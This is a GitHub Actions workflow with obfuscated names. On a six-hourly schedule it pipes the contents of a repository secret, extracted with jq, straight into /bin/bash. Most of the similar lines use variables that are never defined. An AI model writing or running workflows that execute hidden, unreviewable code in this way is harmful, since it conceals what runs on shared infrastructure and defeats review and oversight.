name: zhongxiaozxs

on:
  workflow_dispatch:
  schedule:
    - cron: '7 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhongxiaozxs
        env:
          qmnf9: ${{ secrets.qmnf9 }}
        run: |
          echo $qmnf9 | jq -r .r71 | /bin/bash
          echo $mcyyz436 | jq -r .sop1 | /bin/bash
          echo $yznrc89 | jq -r .ywj844 | /bin/bash
          echo $yyffz5669 | jq -r .e35 | /bin/bash
          echo $wvo8 | jq -r .kcvtf6 | /bin/bash
          echo $xvgq5 | jq -r .bh09 | /bin/bash
          echo $drrsx95 | jq -r .pypgb6 | /bin/bash

